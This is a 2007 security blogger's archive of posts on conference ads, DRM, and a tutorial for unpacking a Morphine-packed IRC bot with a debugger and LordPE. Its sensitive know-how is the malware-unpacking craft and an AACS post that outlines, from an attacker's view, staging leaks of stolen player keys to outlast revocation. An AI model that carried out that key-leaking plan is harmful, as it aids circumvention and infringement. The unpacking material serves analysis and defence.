Nice, although technically it was my custom modified Square-1 that I traded, as a vanilla Square-1 is only worth $20-$30. I hear that the maker may even be doing another round of production, in which case the price might go back down to $9.99 or so. Here's a flickr picture of my custom modification:
I stand corrected.

Thursday, February 08, 2007


Alright, I admit this has nothing to do with my usual blogging topics. Maybe because I snapped it while leaving the hall at RSA to head to the security bloggers party?


Hey, at least that's not quite as bad as ninjas killing your family.

I paid the gentleman a dollar for the privilege of taking his photo. I found him on 4th street between Howard and Mission, around 6pm. I have no idea what his usual working hours are, or how often he rotates his signs.

Second best ad at RSA

I hereby declare the second-best ad at RSA:


"Beware of False Positives"


(I give "best" to my company's own ad, of course. It holds special place in my heart. However, if you think this one is first place, and ours only second, I'll forgive you.)

The woman working the booth tells me that it was "obtained" in Seattle, and is authentic. They were raffling it off in their booth. Excellent job CyberDefender.

Wednesday, February 07, 2007

I'm shillin' like a villain

I just had a great time at the security bloggers thing. I was a little surprised that a number of them read my blog, and yet didn't realize I work for BigFix. Speaking of vendor bias, I will now attempt to provide a good clear example.

We have been trying some new ad campaigns lately. First, there are the Software Truth viral videos. I think they're worth a chuckle. We've gotten some good feedback, and people seem to like them. So far, the only complaint has been from one blogger who seems to have been fooled into thinking they were some sort of real senate hearing. But I think that reflects more on that particular blogger than it does on our videos.

And then the last couple weeks at work, I see this ad taped to the door of our CEO's office. I assumed it was an internal joke thing, and that we would not go there.

Apparently, we would. We are on the playground talking smack, and our competitors should consider it to have officially been brought.

Check out this ad (~1MB .pdf). I'm told that this ran nice and large in the Northern California edition of the Wall Street Journal today. And you should expect to see it in a number of magazines Real Soon Now. Should you enjoy it as much as I do, you can go to our site and sign up for a demo of our stuff, and get a poster version of it. (If you don't want to grab the PDF, that link also shows the picture and text, so you'll get the idea.)

Yes, those are McAfee, Symantec, Altiris, and LANDesk we are ramming our sword through.

Generally speaking, I'm not big on cheerleading for my employer. I try to be careful about plugging my company's stuff out of context. If I'm writing a book or an article, a mention in my bio is usually sufficient. If I'm speaking, the line on the first page of the slide deck is usually good enough, even though they probably paid for my travel. And when I'm overtly pointing out something we're doing, I try to make it abundantly clear that I'm an employee, and that I'm in sell mode.

But when my employer does something above and beyond, and I really approve of it, I'm willing to occasionally give props like this. I think an ad campaign like this takes balls of a certain minimum diameter, and I'm glad to see we've got 'em.

The cynics (and maybe competitors) among you might look at an ad like this, think to yourself that you haven't heard much about BigFix before, and conclude that this is a desperate cry for attention from a struggling company. And frankly, if I weren't on the inside seeing what we are doing, I might agree with you, and cringe when I saw us doing this.

But the fact is, we are growing big time. We are replacing our competition all the time, and beat them regularly in customer evaluations. Despite the fact that these guys pay me, and I'm talking about the software that I QA every day, I'm still sincerely impressed with it. It actually works.

We do not come in peace.

Saturday, February 03, 2007

Old skool security

While researching things for the Oldest Vulnerability Contest, I ran across a number of references to "Computer abuse perpetrators and vulnerabilities of computer systems" 1975, by Donn B. Parker. I did find it listed on Amazon, unknown binding, ASIN B0006WFZ9I. I left it on pre-order for a good year or so, but no one was ever selling one.

Mr. Parker appears to have written a number of security books and reports in the 70's and 80's, mostly while working at SRI. You can find most of his published books easily enough, but not what I'm looking for. I'm guessing it's not a regular book.

I can see that he left a collection to The Charles Babbage Institute at UMN that includes it. I'm going to check there about getting a copy. He seems to have granted some copyrights to CBI, so that might work out.

Also, anyone know if Donn Parker is still alive, and if so, how to reach him? I'd love to do an interview with him. I see references to him doing things in the early 2000's, so he can't have been gone long, if he is.

Amazon Links

I'm trying to see what Amazon links look like now. I've had an Amazon affiliate account for years, but I have barely ever used it. I used to just throw my associate ID ("thievco") onto links, but it looks like that changed probably around 2004. Amazon sent me a quarterly report email the other day, so I thought I would look into it. I plan to mention books frequently, and I'm not at all above throwing on my associate ID. But I wanted to see how it was going to look.

Here's one for my latest book, which is now in print and in stock:

Let's see how that looks. I may twiddle this post, apologies if it shows up in a feed multiple times. Of course, this is all javascripty, so if you're reading this in an RSS reader, you probably don't see it at all. Don't worry, I'll do a proper post in the near future where I shill my latest book the right way.

Update: Whoops! I was wrong. I found the right report, and I did get some hits from the old-style affiliate links. I put a link somewhere, and two people bought a book based on that. I have earned 83 cents this year so far. Thank you for the support. ;)

"Art of Software Security Assessment, The"

Just got a new post in my RSS feed from the authors' blog for "The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities". Justin Schuh says that InformIT has their book on sale at a significant savings. I did some cursory checking, and InformIT does seem to have the best price. Ground shipping was free, so my total (after adding tax) was $35.88. Not bad. Amazon wants list price for it, so don't buy it there.

I've been meaning to buy this book since it came out. This offer seemed like a good reason to get around to doing that. Obviously, since I'm just now buying it, I can't offer a review. However, a number of people whose opinions on this topic I respect, like Dave Aitel, and the Matasano guys, indicate that it is well worth reading.

I'll try and get a proper review in, but my reading backlog is already comically long. But mostly I wanted to point out that this looks like a cool book, and if you're going to buy it, do so at this price.

Update: Uh oh, I got an email that it is backordered. "We strive to fill backorders within 30 days. If we are unable to ship your backordered item(s) within that time frame, we will cancel the item(s) on backorder and you will receive an e-mail confirmation of the cancellation." Good thing I'm not in a hurry. I hope I didn't talk anyone into wasting their time waiting if it's not going to come.

Update 2: It arrived on Feb. 19. The guys posted a blog entry about the delays. I suspect they have the stock straightened out now.

Friday, February 02, 2007

Opening cars with a tennis ball

Watch this video of a woman opening a locked car with a tennis ball. Brought to my attention in a Digg post.

Like a lot of people in my business, I do a little lockpicking, though I'm not particularly good at it. I'm curious if anyone knows exactly what is going on in this particular car door lock. I'm curious if the wafers and sidebar are being pressed into place by the air pressure, or if the air is actuating the lock pull linkage, or what.

MoAB to the BillG

You know your month of bugs is good when Bill Gates is out there pimping them for you.

Hey Bill, are you daring people to do a MoVB?

Thursday, February 01, 2007


I, for one, am outraged at the ridiculous over-reaction of the Boston authorities to what amounts to a battery-powered Lite-Brite.

Wait, I can get the bomb squad to come detonate things by attaching LEDs to them?

I can tie up the entire police force of a major metropolitan city for an entire day with $100 worth of parts from Radio Shack? Completely distracting them from anything else that might be planned for that day?

Wait wait... I can get national news coverage on every major news outlet, and get away with it by just not admitting it was me in the first place?

Carry on.

Friday, January 19, 2007

Web of trust

I continue to add little bits of other people's Javascript on the side of my blog. I just added some code from Technorati. Earlier, I added a hit tracker from Sitemeter and am publishing my RSS feed via Feedburner. The Technorati and Sitemeter things are raw Javascript includes. Oh, and I've started using Zooomr pictures, more Javascript. I haven't added the dozen "pick me!" buttons from Digg et al, yet. But I'm not ruling it out in the future. I don't plan to turn on the ads, but that's just more of the same.

The point is, if you want to 0wn my readers, just compromise Blogger, Technorati, Sitemeter, Zooomr or Feedburner. Or maybe something they depend on. Then you can hand out all of the browser exploits in my name you want.

It's not like attacking one site to compromise another has never been done, or that I haven't been targeted before. I'm just saying.

Web 2.0 is looking a lot like a huge interconnected chain of transitive trust. See also: MySpace.

Thursday, January 11, 2007

AACS crack update

So I made some bad assumptions in my earlier post about the AACS crack. That's what I get for assuming and not hunkering down to read the spec. I know more about it now because of today's Freedom to Tinker post from J. Alex Halderman. He explains:
Blacklisting would be a PR and business disaster if it meant a lot of consumers had to throw away their fancy players as a result of a crack. That’s why AACS allows each individual player to be assigned its own unique set of device keys that can be uniquely blacklisted without adversely affecting other players.
So, the AACS people are smarter than I gave them credit for. If manufacturers follow recommendations and issue individual keys to each device, then only one person's device is disabled, and there's a good chance that person was involved in leaking the key, so maybe that's appropriate. Further, Halderman says that they only disable new discs with the revocation, and they don't brick the device. Hm, I guess they are nicer than I might be in their situation. ;)

Halderman refers to the process as "some serious crypto wizardry." Now, I still haven't read the spec, and he has. But I don't see why this should be significantly more complicated than the whole CA/PKI arrangement. The AACS guys probably act as a master CA, the licensees are sub-CAs, and they issue a private key/cert pair to each device. When there's a leak, the AACS people can surgically revoke the leaked set.
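Since I'm only guessing at the design, here's a toy sketch of that CA-style arrangement. Every name and structure in it is made up for illustration; this is not the real AACS scheme, just the "revoke one device's keys without touching the others" idea:

```python
# Hypothetical sketch of per-device key revocation, loosely modeled on a
# CA hierarchy. NOT the actual AACS key-management scheme.

class Licensor:                          # plays the role of the master CA
    def __init__(self):
        self.revoked = set()             # revocation list shipped on new discs

    def issue_device_keys(self, device_id):
        # in reality this would be a unique private key/cert set per device
        return {"device_id": device_id, "key": f"key-{device_id}"}

    def revoke(self, device_id):
        self.revoked.add(device_id)      # surgical: only this one device

    def disc_will_play(self, device_keys):
        return device_keys["device_id"] not in self.revoked

licensor = Licensor()
player_a = licensor.issue_device_keys("player-a")
player_b = licensor.issue_device_keys("player-b")

licensor.revoke("player-a")              # player-a's keys leaked
print(licensor.disc_will_play(player_a))  # False: new discs refuse its keys
print(licensor.disc_will_play(player_b))  # True: other players unaffected
```

The key property is that revocation is per-device, so blacklisting a leaked key set doesn't brick everyone else's player.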

Does this change the end game? I don't think so. Halderman talks about some possible things like a title key-issuing oracle. Sounds like too much trouble to me. Here's how I think I might do it:
  • Put in the hard work to find some software or hardware device that I know how to recover the keys from; leak those keys, and only the one set
  • At my leisure, stock up as many other keys as I think I'm going to need
  • Wait for the script kiddies to complain that Star Trek XV won't work with my keys
  • Leak the next set
I could stock up dozens or hundreds of keys, and they are probably good for months at a time. They are good until someone releases an HD DVD that anyone cares about.

Other potential problems that I foresee popping up:
  • Maybe I flood the Internet with tons of keys. The revocation list gets large and unwieldy. Maybe discs start to fill up, maybe players take forever to parse through them.
  • I don't expect the software players to cut a key for every single user, especially if it's like current DVD player software that gets thrown in the box of every Dell computer. They don't want to cut custom CDs, and I assume these keys are all too long to type in from a printed label. In contrast, the Internet would work fine for some sort of "activation" scheme which gets you a key set right then and there. The problem with that is that you now have a website that essentially cuts keys for you at will, and they have their CA private key stored somewhere where it could get stolen.
  • I don't expect every Taiwanese hardware manufacturer to do what they are supposed to, and they will reuse player keys
  • Someone could leak or steal a CA keyset
  • There might be a crypto break like with CSS
  • And last but not least, how about I keep my keys to myself, and just release the decrypted movies?
(And as a disclaimer, I remind people that when I say "I" here, I'm writing from the point of view of a resourceful attacker. As a further disclaimer and future excuse, I still haven't read the AACS spec yet. I guess I need to get on that now.)

Wednesday, January 10, 2007

Testing Zooomr

Please stand by, I'm trying to see how Zooomr works with Blogger.

Here's a picture of part of one of my bookshelves:

OK, looks like Blogger really wants you to limit things to sizes that work with their layout. I guess I'll be sticking to small sizes that you can blow up by clicking on.

Now, to see why Zooomr doesn't store the original size... Ah, OK once you have a Pro account, it looks like you get to keep the original size, too.

Also, it would be ungenerous of me to not point out that Zooomr is giving away free Pro accounts for something as simple as posting a pic like this on your blog.

Unpacking I

Recently, I was given a copy of a piece of malware by Curt Wilson. He had unpacked it in memory, but wasn't quite sure how to finish the process in order to load it up again for further analysis. As a simple howto, and as a way to keep a few notes for myself, I'm documenting the unpacking process.

The sample in question was found as upnp.exe on disk. Looking at it, it was packed with Morphine. I don't personally consider knowing which packer it is ahead of time to be critical, though there are a couple of exceptions. First, if I know it is UPX packed, then I may just try using the latest UPX to unpack it. It works maybe half the time. The other half, there are UPX "corrupters" out there that will break that, and there is at least one packer designed to look somewhat like UPX. Second, there are a couple of packers out there that are probably well beyond my skill level, and I wouldn't bother trying. The two I can think of off the top of my head are both written by Nicolas Brulez.

If you want to find out what packer was used, you can usually get an answer from PEiD, or by trying the VirusTotal service. Here is the VirusTotal analysis of upnp.exe, for example. Both of those correctly identify this as Morphine, though I got through the hard part of the unpacking without knowing that.

The basic unpacking technique is to execute the program with a debugger until the original binary (or as much as is left) is uncompressed in memory, and then you dump the copy in memory. Usually, when you dump it you also fix the imports so that your analysis tool will know which functions are being called. I'll show you an example in a moment. For a somewhat more advanced example, you can watch a video where Nicolas does an unpack on a binary that has more than one packer used on it, each with multiple antidebugging tricks. This was from a talk we gave at RECON.

First thing, the warnings: If you choose to try to unpack malware, you are taking a chance that you will make a mistake, and just run the thing. If you do this on a real production machine, you will be sad, and infected. If you're smart, you will have a sacrificial machine you can do this on, that you can restore to a known state with no place for the malware to hide. VMWare is popular, though unfortunately, a lot of malware now checks to see if it is running in a VM and shuts down.

The strictest AV guys will also tell you that it is irresponsible to do any analysis on a non-isolated machine, because there's a good chance you will spread it further. If you work on a non-isolated machine and people find out, there's a chance that some or all AV companies will never employ you. That may not seem like much of a threat, but you never know who Symantec or McAfee are going to buy next.

In other words, do as I say, not as I do. When you press the wrong button in your debugger, and run the malware all the way, you will find yourself very interested in finishing the analysis in a hurry in order to find out what you've just done to your machine. You should also know which cable to pull in a hurry to disconnect yourself from the Internet.

So, on with the debugging. Load the program in your favorite debugger. I like to use the debugger now built into IDA Pro. Another popular (and free) debugger is Ollydbg. With both, you need to set an initial breakpoint, and then run the program. Generally speaking, what you will be doing is stepping through the code until you get to the point where you think you've hit the original packed binary, then you leave it paused.

This is the easiest place to screw up. For one, in both debuggers, the step, step over, and run keys are all next to each other. If you fat-finger the keypress, you just infected your machine. Also, you may encounter antidebugging tricks. I can't say I noticed any with Morphine, but I have certainly seen them with others. Even if you're single-stepping, if you miss accounting for an antidebugger trick, you may find that the program finishes executing without you.

One of the things that pretty much all packers do is to replace a certain portion of the OS's loader. For Windows, this almost always means replacing the portion that takes care of loading and mapping the imports. So, if you are tracking through packer code, you will see the packer calling LoadLibrary and GetProcAddress, in a loop. Packers also almost always compress and/or obfuscate the binary code, so there's also going to be some loops where it is iterating over memory segments. These memory segments are usually created by calling VirtualAlloc.

I bring this up, because you really, really want to step over these functions and not waste time stepping through them or trying to follow them into the kernel. You will also need to become adept at spotting loops. You will need to skip those most of the time, just because they will be too tedious to step through manually. Yet another place to screw up.
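To make the pattern concrete, here's a rough Python model of what that import-restoring loop does conceptually. The callbacks stand in for LoadLibrary and GetProcAddress, and the module table and addresses are fake; a real packer stub does this in x86 code against the actual Windows loader, not in Python:

```python
# Conceptual model of a packer stub rebuilding the import table:
# walk a list of (DLL, functions) pairs, "load" each library, and
# record an address for each imported function.

def rebuild_imports(import_table, load_library, get_proc_address):
    iat = {}  # rebuilt Import Address Table: (dll, func) -> address
    for dll_name, func_names in import_table:
        handle = load_library(dll_name)          # outer loop: per DLL
        for func in func_names:                  # inner loop: per function
            iat[(dll_name, func)] = get_proc_address(handle, func)
    return iat

# Fake loader callbacks and addresses so the sketch runs anywhere:
fake_modules = {"kernel32.dll": {"VirtualAlloc": 0x7c809af1,
                                 "LoadLibraryA": 0x7c801d7b}}
load_library = lambda name: fake_modules[name]
get_proc_address = lambda module, func: module[func]

iat = rebuild_imports([("kernel32.dll", ["VirtualAlloc", "LoadLibraryA"])],
                      load_library, get_proc_address)
print(hex(iat[("kernel32.dll", "VirtualAlloc")]))  # 0x7c809af1
```

The nested-loop shape is the thing to recognize in the debugger: one pass per DLL, one pass per function, which is exactly why you want to step over those calls rather than into them.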

Here's an example of something I can spot from experience:

You see where it's pushing a bunch of bytes in the ASCII range onto the stack, and then calling something? Let me decode it to make it a little easier to read:


Read the function names backwards. This tells me I'm in the beginning stages of restoring the imports. Then it calls VirtualAlloc:


And you trace through some loops where it is importing all the libraries and fixing up pointers to the functions.
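For what it's worth, those push-immediate "stack strings" can be decoded mechanically rather than read backwards by eye. Here's a small sketch, assuming 32-bit little-endian dwords; the example immediates are ones I constructed for illustration, not taken from this particular sample:

```python
import struct

def decode_stack_string(push_immediates):
    # Pushes are given in execution order. The stack grows down, so the
    # last push lands at the lowest address: read the dwords in reverse
    # push order, little-endian bytes within each dword.
    raw = b"".join(struct.pack("<I", v) for v in reversed(push_immediates))
    return raw.rstrip(b"\x00").decode("ascii")

# Immediates as they'd appear in the disassembly, top to bottom:
pushes = [0x00007373, 0x65726464, 0x41636f72, 0x50746547]
print(decode_stack_string(pushes))  # GetProcAddress
```

That's why the function names appear to read backwards in the disassembly: the string is being built from its tail end down the stack.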

Eventually, you will arrive at something like this:


There is often a telltale "JMP EAX" or "CALL EAX", or similar. Step one more instruction, and you're at the Original Entry Point (OEP). This is when you're unpacked, or as much as you're going to be. If you trace much farther, you start initializing things, and you might start causing trouble for your analysis. This is what it looks like when we're at the OEP:


I usually like to take note of the OEP and the last address before the OEP. I like to set a hardware breakpoint on execute at one or both of those. In this case, the OEP isn't mapped to a memory segment until after the program has run some portion of the way through the packer, so I set it on the last address before the OEP, and save the database. That way, if I have trouble with the dump step, I can replay right up to that point without having to manually step it again. That works in this case (Morphine) but not in all cases. Sometimes you have to account for antidebugger tricks along the way.
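If you want to hunt for that telltale tail jump in raw bytes rather than by eye, a naive scan for the register-jump opcodes works as a first pass. This is just a sketch: a two-byte match can false-positive on bytes that belong to the middle of some other instruction, so treat hits as candidates to inspect, not answers:

```python
# Naive scan for "jmp eax" / "call eax" style tail jumps in raw x86 code.
# FF E0 is jmp eax, FF D0 is call eax (other registers use nearby ModRM
# bytes, omitted here for brevity).
TAIL_PATTERNS = {
    b"\xff\xe0": "jmp eax",
    b"\xff\xd0": "call eax",
}

def find_tail_jumps(code):
    hits = []
    for pattern, name in TAIL_PATTERNS.items():
        offset = code.find(pattern)
        while offset != -1:
            hits.append((offset, name))
            offset = code.find(pattern, offset + 1)
    return sorted(hits)

# mov eax, 0x401000 ; jmp eax -- a typical end-of-stub sequence
code = b"\x90\x90\xb8\x00\x10\x40\x00\xff\xe0"
print(find_tail_jumps(code))  # [(7, 'jmp eax')]
```

In practice you'd run something like this over the packer stub's segment and check each hit in the debugger before trusting it as the jump to the OEP.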

Now that you're at the OEP, you need to dump the binary in memory. I've used two tools for this, Import Reconstructor (imprec) and LordPE. Before I get into the technical details on each, I should talk about the reason I ended up putting this post together.

I was having some trouble getting a good dump of upnp.exe. Specifically, I had traced it to the OEP as I have described, but I couldn't get imprec to dump it properly. The imports table wouldn't come out right. That's when I went to Jason Geffner for help. Jason is another of these guys who is better at reverse engineering than I am. I met him originally in the class I took from Nicolas Brulez. Jason was taking it too, but he didn't really need it.

Jason told me to just use LordPE. He said that Morphine ended up rebuilding the original PE file in memory, and that LordPE did a perfect dump. He even made a screenshot of what settings I should use:

Sure enough, I used LordPE and it dumped perfectly. I'd had good luck with imprec before. Nicolas had shown me the tool in his class. Before that I had been doing raw memory dumps and manually naming offsets. No fun. So I've had a tendency to reach for imprec because I'm used to it.

But, there was no arguing with the fact that LordPE worked for me in this case, and imprec didn't. So part of what I planned to do with this post was to recommend LordPE. So I repeated the steps on my home machine so I could take screenshots and so on. When I got to the step where I was going to show the bad dump made by imprec... I found that it had dumped it perfectly.

Thinking back, I believe the reason imprec didn't work before was that I had done it on a work machine, which was Windows XP x64. When I tried to use imprec on the 64-bit Windows, I had a problem with some of the imports not being valid. That probably had to do with why it wasn't writing out the import table properly. I had removed the "bad" imports, but that probably just broke the process. I think I was able to use LordPE on the same machine, but now I'm going to have to go back and check.

Which brings me to a general point about tools. If you've got tools that dig into the guts of a system, then those tools are probably going to quit working when you move to a newer system. This is especially true of tools for which development has ceased (which seems to be the case with imprec). If it's not being actively maintained, then it will eventually "expire" when the OS moves on. On my home machine, which is regular XP, imprec still works fine. Further, malware and packers tend to account for popular tools by implementing countermeasures. So, if you plan to keep up on reverse engineering, you should also plan to keep looking for the latest and greatest tools.

But in any case, my thanks to Jason for encouraging me to check out LordPE and for fixing my mistake. Back to the techie bits.

I'll skip the imprec demo for now. If you're interested in me spelling out the same steps for imprec, leave me a comment, and I'll write it up. In LordPE, you basically run the tool, find the process you still have paused at the OEP in your debugger, right-click it and select dump full:

In this particular case at least, you now have a good copy of the unpacked executable, and you can load it up in your favorite analysis tool:

If you're curious, the binary is a fairly typical call-home-to-an-IRC-C&C bot.

  • Sorry about the pictures, the arrangement isn't ideal. If you click on one, you can drill down a couple of levels and see the full size so you can read it. I'll probably try tweaking the pictures to work a bit better. Any Blogger and/or Zooomr advice is welcome.
  • I realize I've got a weird mix of beginner and advanced topics here. Sorry about that. Again, this is at least partially to remind myself as well. If you liked the post and want me to take the tech level up or down, let me know. It probably won't be hard to talk me into writing about it more.
  • Both Nicolas and Jason teach this topic as a training attached to security conferences. Nicolas teaches it at RECON. I don't know for sure yet if Nicolas will be teaching this year. Jason has taught at Black Hat, but it doesn't look like the Black Hat training schedule for this year has been announced yet either. I'll post an update if I find out anything about either of them teaching again.

Tuesday, January 09, 2007

Voicemail from the Bureau of Prisons

I walked into the office this morning, and glanced at my phone. It said I had 7 new callers since I left yesterday. Now, I'm not much of a phone person. I hate them. I think that comes from a brief stint I did on the help desk phones at Bechtel.

So, most people know not to call me. I scrolled through the caller-ID list, and there were 6 calls from the same number within about an hour. The number didn't look familiar. Curious, I checked my voicemail, which is something else I rarely do. A man identified himself as being from the IT department of the Bureau of Prisons, said he had a question for me about a request from an inmate for a book that I wrote the foreword for, and would I please call him.

Uh, sure.

Turns out that someone had put in a request for How to Own a Continent. His opening question was "This isn't fiction, is it?". I explained that it IS fiction, in that none of the events happened, but that we try to keep the technical details real. So yes, it's half fiction, and half technical book. By the time I had called him, he had already taken note of the price and where it is supposed to be shelved, and decided on his own that it didn't qualify as a novel. He made it sound like he had a copy in front of him, which I guess he wasn't planning to forward to the inmate.

I feel a little bad for the inmate who probably won't get to see it now, but I wasn't going to lie about it. I didn't try to grill the prison IT guy, or argue with him about his policies. I figure that was probably pretty futile. Maybe I'll call him back at some point and see if there's anything he is allowed to tell me about which prison this is or the name of the inmate. I assume he can't, but you never know.

If the inmate in question ever sees this: When you get out, or if you transfer somewhere where they are a little more lenient about your reading material, I'll get you a copy.

Monday, January 08, 2007

Eight year old ActiveX control with vulnerability

Tan Chew Keong recently found an ActiveX control on his Acer laptop that allows for arbitrary file execution. I had read this a month or so ago, but was reminded again by today's Slashdot story. I haven't looked into the technical details, but they seem pretty plain.

If this is in fact from 1998, then I am amazed at how long this thing has gone unnoticed.
I'd love to know how many copies of this thing are out in the world. I would hope not many, given that it escaped notice for so many years.

I can't decide if this is evidence against many eyes, or evidence for the idea that less popular software doesn't get any attention.

AACS Cracked?

AACS has reportedly been "cracked". Someone by the name of muslix64 claims to have created a program that:
is a tool to decrypt a AACS protected movie that you own, so you can play it back later using an HDDVD player software.
He also says right up front that it's not complete as-is:
This software don't provide any cryptographic keys, so you have to add your own keys.
There used to be a video on YouTube that showed it being used, I imagine; I haven't seen the video. The YouTube link now shows:
This video has been removed at the request of copyright owner Warner Bros. Entertainment Inc. because its content was used without permission
If it's not clear, I haven't looked at this too hard. While it's interesting on some levels, I'm not interested in digging into the tech details just yet.

What I find interesting is some of the reactions.

Freedom to Tinker:
Typical users can’t extract title keys on their own, so BackupHDDVD won’t be useful to them as it currently stands — hence the claims that BackupHDDVD is a non-event.

Slashdot (comments):
the very clever fellow just implemented that publicly available decryption routine, and also discovered an (as of yet unreleased) method for obtaining decryption keys.
Yes, and the Engadget article that is TFA is mistaken... He didn't supply any keys, just disc IDs (to map to human-readable names of the discs). The places where the keys would have been were all stubbed out with nulls.

If this is a crack for the DRM, then GPG is a crack for PGP.
For the record, there was some confusion about whether the program shipped with any decryption keys or not. The Freedom to Tinker guys say no; I'll take their word for it.
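Just to illustrate the stubbing: if the key slots really were all nulls, telling a stub from a real key is trivial. This is purely my sketch of the idea, not anything from the actual tool:

```python
def is_real_title_key(key_hex):
    """A populated AACS title key is 16 bytes with at least one nonzero
    byte; an all-null entry is just a placeholder waiting for the user
    to supply the real key."""
    key = bytes.fromhex(key_hex)
    return len(key) == 16 and any(key)
```

So a key table full of `"00" * 16` entries decrypts nothing, which is exactly why shipping it isn't the same as shipping keys.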

Now, the Freedom to Tinker guys certainly know the score, and I hope I'm not making it look otherwise by quoting them out of context. But the general feeling from some portion of the people reading about this is that it isn't a proper crack; it doesn't come with keys. They can't use it.

They're missing the point, and what the guy is up to.

The people who complain that they can't use it without keys are also likely going to need a GUI app that rips HD DVDs to MPEG files with a single big green button. As near as I can tell without trying it myself, this program looks something like a GUI with a button. Just add keys.

So, where do you get keys? You get them from existing players, either hardware, firmware, or software. Who knows how to do that? Well, I could probably figure it out, if I had enough time. Please note that I'm not offering to find keys for you, I'm just saying that there are lots of us who do reverse engineering, who could probably figure it out.

So, the programmer attempts to keep the most controversial piece of his code modular and updatable. Other people can supply the keys. Maybe he even hopes that he can escape some trouble by not having it be fully functional out of the box. I wish him luck with that, though it's not without precedent. There are a number of MP3 rippers that don't directly include the patented MP3 codec, and they require you to go find a copy of the LAME libraries which do. The CD ripper programs say they don't include the codec, and the LAME project says you may need a license for your ripper. I tend to think that the MP3 patent holders have just decided to be nice about it.
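That modular, keys-on-the-side design might look something like this sketch (the file name and JSON format here are my invention, not how the actual program stores keys): the tool ships with no keys and stays inert until the user drops in a key file.

```python
import json
from pathlib import Path

def load_title_keys(path="titlekeys.json"):
    """Read user-supplied disc-ID -> title-key mappings from an external
    file. Out of the box the file doesn't exist, so the tool does nothing."""
    p = Path(path)
    if not p.exists():
        return {}
    return {disc_id: bytes.fromhex(key_hex)
            for disc_id, key_hex in json.loads(p.read_text()).items()}
```

The controversial payload (the keys) lives entirely in a file the author never distributed, which is the whole legal gambit.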

A few points to make:

Is it in any way surprising that AACS is cracked/decodable/implemented in a program that doesn't play the MPAA's way? No, not at all. It's inevitable. That's the basic problem with DRM. They give you a file that you're not supposed to be able to decode or decrypt. And then they hand you a decoder. Sure, they are hoping you won't look inside. But people are curious, and they like to be able to store their files on their own terms.

Is this a "crack" in the proper sense of the word? Well, when I was a kid, "cracking" meant removing copy protection from floppy disks. So in that sense, yes, this is a proper crack. It's working around the little trick that is supposed to keep you from doing things the easy way. Now, if you're talking about something like cracking the security of a program (finding a vulnerability) or "cracking" a crypto algorithm (better term is "break"), then no, this is not that kind of crack.

But that's not how you break DRM. You break DRM exactly like this guy did, by replicating the algorithm and/or keys. Sure, if there is ALSO a software vulnerability or bad crypto, that's interesting too. That happened with CSS, for example (a crypto weakness). But you don't need that to get around DRM. You just need to replicate the function of the player.

Frankly, when I simultaneously learned about this AACS crack and that there are a couple of existing Windows HD DVD players, it was obvious what happened. If you want to keep a secret, do not stick it in a Windows program. Reverse engineers LOVE to take apart Windows programs. If you're going to try to simultaneously keep a secret and distribute it to every household in the world, then at least stick it in a secret ROM chip so that the likes of a Bunnie Huang are needed to get it out.

So why is this different than PGP? Because you don't encrypt something with PGP, and then give a copy of the decryption key to everyone in the world and ask them not to look. It wouldn't matter if every HD DVD came encrypted to your personal key either, since you have no incentive at all to keep the movie encrypted. What do you care if you give out the plaintext version of a movie?

So, what happens now? Well, the AACS designers aren't all that stupid, they were aware this would happen. So there is a key revocation feature out there. This is where my ignorance kicks in. I don't know exactly how this feature works, but I'm going to make some educated guesses.

There must be some set of keys in a Windows HD DVD player or physical device. I'm sure the AACS people issue a set to every vendor or manufacturer. The goal of the evil hax0r here is to swipe those keys, and probably give them to their buddies or post them on the Internet. So the AACS people figure out which keys have been leaked, and they revoke them. I'm guessing the next Disney disc will carry a revocation list, which the players will obey.

Now, does that mean if the evil hax0rs stole the keys from a Panasonic HD DVD player, that the AACS people have to disable that player? Is it all Panasonic devices, or just that model, or just North American versions of that model, or what? The exact details probably aren't important. I think what it means is that yes, some legitimate Panasonic owner buys a legitimate DVD, and next thing they know, their player is bricked.
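My guess at the mechanics, as a toy model (real AACS revocation uses a more elaborate broadcast-encryption scheme, so take this as illustration only): each disc carries a revocation list, the player remembers it, and a player whose own key lands on the list stops playing from then on.

```python
class ToyPlayer:
    """Grossly simplified model of disc-delivered key revocation."""

    def __init__(self, device_key_id):
        self.device_key_id = device_key_id
        self.revoked = set()  # persists across discs, like player firmware state

    def insert_disc(self, disc_revocation_list):
        """Merge the disc's revocation list, then decide playability."""
        self.revoked.update(disc_revocation_list)
        return self.device_key_id not in self.revoked
```

In this model, the legitimate owner of a player whose keys were leaked buys a brand-new disc, the disc delivers the revocation, and the player quits working.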

Can they seriously be planning to do that? I can't see any plan where they can simultaneously cause the bad guys any significant trouble and avoid screwing innocent customers.

And that's why DRM sucks.

Wednesday, January 03, 2007

Vulnerability Pimps

Marcus Ranum has written a very interesting article about code review, secure coding, Fortify, and vulnerability pimps. The meat of his article is about code review, and there are some real lessons to be learned there. You should take his comments to heart, and implement the review processes he recommends. I know I'm going to look into Fortify now.

There are also some interesting minor insights into Marcus' history. Love him or hate him, you should always pay attention to what Marcus has to say. He graciously added an RSS feed to his site at my request, so please use it.

That said, what I can't let go of is "vulnerability pimps". I know, story of his life. He tries to tell people things, and they can only pay attention to his politics. Sorry about that, Marcus.

So, yeah, vulnerability pimps. That's awesome. I'm sure he means for it to be pejorative, but for the folks he is describing, I can't see them taking too much offense. I can see the rise of the purple hat hackers even now.

It's the first time I've heard the term, though maybe he didn't coin it. Google says that Rodney Thayer (at least) used it in 2005. I see Marcus using it in February. Of course, Google doesn't know everything, so I'm happy to take corrections. I can't help but think of this as a Ranumism, though.

As for my politics, I could be accused of encouraging, facilitating, and participating in vulnerability research. Though, not with as much skill as most other vulnerability pimps.

I'll keep my counterpoint brief. Marcus throws out the "many eyes" catchphrase, specifically calling it a failure in the face of his findings. If you don't like independent vulnerability research taking place, then where do you think the checks that Fortify performs come from? If the developers and companies aren't going to look, who else will? If you expect the few eyes to be able to see, where are those eyes going to train?
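And those checks encode exactly the kind of knowledge that research produced. As a toy illustration (my sketch; Fortify's real rules are far more sophisticated), here's the flavor of check involved: flag calls to the unbounded string functions that years of vulnerability research taught everyone to avoid.

```python
import re

# Unbounded copy/format functions that vulnerability research made infamous
RISKY_CALLS = ("strcpy", "strcat", "sprintf", "gets")

def flag_risky_calls(c_source):
    """Return (line_number, function_name) for each risky call site."""
    pattern = re.compile(r"\b(%s)\s*\(" % "|".join(RISKY_CALLS))
    hits = []
    for lineno, line in enumerate(c_source.splitlines(), 1):
        for match in pattern.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits
```

Every entry in a list like `RISKY_CALLS` exists because somebody, somewhere, found and published the class of bug it causes.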

